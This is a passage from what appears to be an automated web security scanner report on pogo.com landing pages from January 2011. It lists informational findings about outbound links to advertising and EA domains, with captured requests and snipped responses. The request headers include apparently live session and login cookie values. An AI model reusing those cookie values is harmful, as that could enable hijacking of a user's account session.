<br><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?"></script><noscript><a href="http://ad.doubleclick.net/jump/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?" target="ad"><img src="http://ad.doubleclick.net/ad/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?" width=160 height=600 border=0 alt="Click Here!"></a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2099807974"></iframe>
...[SNIP]...

16.56. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2049167055
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 20349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2049167055"></iframe>
...[SNIP]...

16.57. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_3&pageSection=free_home_mtx_shopping

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=830937686
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_3&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:20 GMT
Server: Apache-Coyote/1.1
Content-Length: 20404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=830937686"></iframe>
...[SNIP]...

16.58. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_add_1&pageSection=free_home_mtx_shopping

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=797027302
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_add_1&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:20 GMT
Server: Apache-Coyote/1.1
Content-Length: 20352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=797027302"></iframe>
...[SNIP]...

16.59. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=463850276
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:51 GMT
Server: Apache-Coyote/1.1
Content-Length: 20346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=463850276"></iframe>
...[SNIP]...

16.60. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_2&pageSection=free_home_mtx_shopping

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1224277341
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_2&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:00:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 20379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1224277341"></iframe>
...[SNIP]...

16.61. http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_2&pageSection=free_home_mtx_shopping

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=772794099
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_2&pageSection=free_home_mtx_shopping HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:20 GMT
Server: Apache-Coyote/1.1
Content-Length: 20449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=772794099"></iframe>
...[SNIP]...

16.62. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphone

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=250820887
http://mg.eamobile.com/?chId=212&ep=mg&p=31583&mc=POGO-CH-LB&u1=pogo_PogoGames_PogoLandingPage
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:52:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 21372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<div id="iphone-container">
   <a href="http://mg.eamobile.com/?chId=212&ep=mg&p=31583&mc=POGO-CH-LB&u1=pogo_PogoGames_PogoLandingPage"><img alt="" src="images/Get-iTunes-BT1.png" class="button1" width="184" height="36" border="0" /></a>
   <a href="http://mg.eamobile.com/?chId=212&ep=mg&p=31583&mc=POGO-CH-LB&u1=pogo_PogoGames_PogoLandingPage"><img alt="" src="images/Get-iTunes-BT2.png" class="button2" width="216" height="43" border="0" />
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
